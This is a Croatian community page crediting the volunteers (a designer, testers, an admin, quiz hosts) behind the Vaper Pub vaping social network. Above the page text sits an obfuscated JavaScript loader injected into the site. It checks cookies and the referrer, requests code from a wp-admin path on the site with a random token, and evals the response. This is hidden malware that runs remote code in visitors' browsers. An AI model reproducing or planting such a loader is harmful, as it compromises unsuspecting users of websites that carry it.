;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

Vaper Pub AllStars

kad se male ruke slože

Uvodna riječ

Ovaj dio bi se na standardnim stranicama zvao “O nama” ili “Naš tim”, no to u slučaju Vaper Puba ne možemo primijeniti.
Zašto? Pa zato što su za doprinos stranici, dizajnu, funkcionalnosti, izgledu zaslužni neki od članova zajednice svojim volontiranjem.

Upustio sam se u projekt vrlo ograničenog znanja i sposobnosti te shvatio ubrzo da je Vaper Pub društvena mreža izuzetno velik zalogaj za mene samog – ekipa je priskočila u pomoć. 

Moram naglasiti da nitko od njih nije moj “kućni prijatelj”, rođak. S većinom od njih nisam do početka projekta imao nikakvu značajnu komunikaciju, ako je komunikacije uopće bilo.

Svidio im se projekt, svidjela im se ideja, možda ih je ponesao (moj) entuzijazam, dobra (?) ideja, te su se jednostavno pridružili.

Stoga je ovo prvi korak, virtualni zid ispisan njihovim imenima njima u čast. Posveta njihovom trudu sa svrhom upoznavanja članova, trenutnih i budućih, tko je zaista iza ovog projekta.

Redoslijed na listi nema nikakav značaj po važnosti, nego kako sam kojeg upoznao i kako se pridružio projektu.

Dizajn.

Jeste li ikad upoznali kojeg dizajnera?

Ja sam imao prilike upoznati nekoliko, doduše onako usputno. Prije par godina, vrhunski dizajner iz RH (neću ga imenovati, al fakat je vrhunski) dolazi u tadašnju firmu u kojoj sam radio, sred zime, vani pingvini govore:”hebeš sve idemo na jug”, a lik dolazi u natikačama na sastanak.

Pitao sam se zašto. Sad kad sam bolje upoznao Darka, jasno mi je.

To je trknuta rasa. Al ima nešto u tom dizajnu.

Znaš ono kad pogledaš logo i “logo”. Vidiš da je ovo što je crtao dizajner skladno, priča priču, ima stil, prati temu. Ima smisla. No očito moraš biti “van okvira” da bi razina kreativnosti bila na tom nivou.

Neke od stvari za koje je Darko zaslužan:

 • dizajn Vaper Pub logoa u svim inačicama i varijantama
 • odabir, usklada boja Vaper Pub stranice
 • nebrojeno mnoštvo prijedloga za UX koje smo implementirali ili pokušavamo

Sveprisutan lik koji se odjednom stvorio. Eto sad je on tu, to je on, sad će on nama nešto reći.

I pametno je imao za reći :D

Iako je nešto blaži i “much more forgiving” nego prethodno navedeni Darko – Svetkomila (Matko) je zaslužan za push Vaper Pub stranice u ovu formu u kojoj je danas – da sve leti.

Što prijedlozima, što povezivanjem sa svojim poznanicima, pa sve do nezaobilaznih, a izuzetno bitnih emotikona, tipa – “Qark je ljut”.

Čovjek je koji voli Božić. 

Neke stvari za koje je Svetkomila zaslužan:

 • utjecaj na generalno vedro raspoloženje (vrlo bitno)
 • poveznica između članova “tima”
 • generalno testiranje apsolutno svake funkcije stranice
 • doprinos Vaper Pub radiju
 • “Qark se ljuti” emotikon, kao možda najbitnija funkcija ove stranice
 • postavke web stranice

Admin Antoni. 

Kad netko zna, onda zna – nema se tu šta filozofirat’. Konkretno i direktno u sridu.

Vrlo friendly lik koji je posvetio svoje slobodno vrijeme i još važnije – znanje – da ova stranica profunkcionira u formi u kakvoj je danas.

Iako ne znam čime se čovjek konkretno bavi – odmah je reko: “napravi to, to i to”.

To, to i to je utjecalo na izvedbu web stranice gdje se newsfeed više ne učitava 22 sekunde nego 3.

Zahvaljujući Svetkomili upoznali smo Antonia koji je riješio goruće probleme i par dizajnerskih sitnica.

Stoga mu se ovim putem zahvaljujem(o), za početak.

Za što je zaslužan:

 • izuzetna brzina izvođenja stranice
 • postavke stranice za koje niti ne znam kak su izvedene i gdje – al rade
 • rješavanje problema, krivih prikazivanja određenih polja i slično
 • savjetovanje da pređemo na novi sustav.

Karla ne treba posebno predstavljati. Već je dugo vremena jedan od “kvazi” gostiju streama koji ide petkom :)

U biti nije samo “kvazi” gost već on i gosp. Drvarek kreiraju pitanja za zadnjih 10-15 kvizova :D 

No ono što ne znate je – koji je njegov poseban doprinos kreiranju ove zajednice. 

Naime još dok nije postojala vaper-pub.com stranica Karlo je imao ideju da se napravi neki oblik live video chata u koji svatko može ući kada god poželi i pitati što god mu padne na pamet… ili jednostavno sjediti u sofi, gol i jest komad pizze kao neki :D

Osim toga je zaslužan za mnoštvo dizajnerskih rješenja od kojih je možda najupečatljiviji ovaj zadnji dizajn “Vepar Pub” logoa :D 

Dr. Varek … lik samo takav.

Kak kažu – da ga nema, morali bi ga zmislit.

Mikser neparljivoga, programer nepoznatoga i zajebant svega i svačega.

Svaki tjedan vas maltretira sa svojim pitanjima u kvizu tokom live streama petkom, no moramo priznati da je pristup originalan, a pitanja stvarno svestrana :D 

Poznat po:

 • skoro jestiv roštilj
 • mix vape tekućine s okusom kave i limuna…jer zakaj ne…YOLO